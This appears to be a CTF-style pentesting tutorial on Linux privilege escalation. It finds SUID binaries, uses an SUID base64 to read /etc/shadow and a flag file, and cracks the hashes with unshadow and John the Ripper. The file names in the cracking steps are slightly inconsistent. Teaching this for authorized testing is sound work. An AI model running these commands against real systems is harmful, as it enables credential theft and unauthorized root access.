🚩 Privilege Escalation Using SUID and GTFOBins

Privilege escalation is a core skill for penetration testers and ethical hackers. One common vector involves SUID (Set-user Identification) binaries. In this guide, I’ll walk you through escalating privileges by leveraging SUID files and the GTFOBins database, with practical examples—just like you’d do in a CTF or penetration test.

---

🛡️ What is SUID?

Linux permissions go beyond read, write, and execute. The SUID (Set-user Identification) bit, when set on an executable, allows users to execute the file with the permissions of the file owner (often root). That means, if misconfigured, SUID binaries can let us perform actions as root!

---

🧑‍💻 Finding SUID Binaries

Let's start by searching for files with the SUID bit set.

find / -type f -perm -04000 -ls 2>/dev/null

• -type f: look for files only

• -perm -04000: find files with the SUID bit set

• 2>/dev/null: suppress permission errors

Tip: Compare your results to GTFOBins SUID List to spot potential exploitation vectors.

---

🛠️ Example: Exploiting SUID with Base64

Suppose you spot base64 as an SUID binary. According to GTFOBins, you can leverage it to read files you don’t normally have permission for, such as /etc/shadow.

1. Try Reading /etc/shadow

cat /etc/shadow

You'll likely see a Permission Denied error.

---

2. Use SUID Base64 to Read the File

Let’s trick the system by using base64 to read and decode the file contents.

lfile=/etc/shadow

base64 "$lfile" | base64 --decode

• lfile is just a variable (you can name it anything)

• This command base64-encodes the file, then immediately decodes it back—effectively bypassing restrictions.

💡 Copy the output and save the relevant user's password hash for later cracking.

---

🧩 Cracking a User's Password

Now, let's extract and crack a user's password using john the ripper.

1. Extract Password Hash

• Open a new file with nano and paste the password hash line you copied from /etc/shadow:

  nano user2.txt

• Copy the relevant username line from /etc/passwd into another file:

  nano user2.txt

---

2. Combine with unshadow

Combine both files to make a file suitable for password cracking:

unshadow user.txt user2.txt > userpassword

---

3. Crack with John the Ripper

john --wordlist=/usr/share/wordlists/rockyou.txt userpassword

• To see cracked passwords after some time:

  john --show userpassword

---

🎯 Finding and Reading the Final Flag

Suppose you need to find a flag file (flag3.txt):

find / -name flag3.txt 2>/dev/null

If you try to cat the file and get Permission Denied, use SUID base64 again:

flag=/home/ubuntu/flag3.txt

base64 "$flag" | base64 --decode

---

📝 Key Takeaways

• SUID binaries can be dangerous if misconfigured—always check them during a penetration test.

• Use GTFOBins as your go-to resource for finding ways to exploit these binaries.

• Base64 is just one example—there are many more, so always cross-reference your SUID findings.

---

💡 Final Notes

• Always have permission before testing these techniques!

• Responsible disclosure is crucial—report any findings to the system owner.

---

🔗 References

• GTFOBins SUID

• John the Ripper

• Linux SUID Exploitation Explained

---

If you found this guide useful, follow me for more practical pentesting tips! Got questions or want a deeper dive into privilege escalation? Drop a comment below.

---

#Linux #Cybersecurity #PrivilegeEscalation #GTFOBins #EthicalHacking #PenTest #SUID #RedTeam #CTF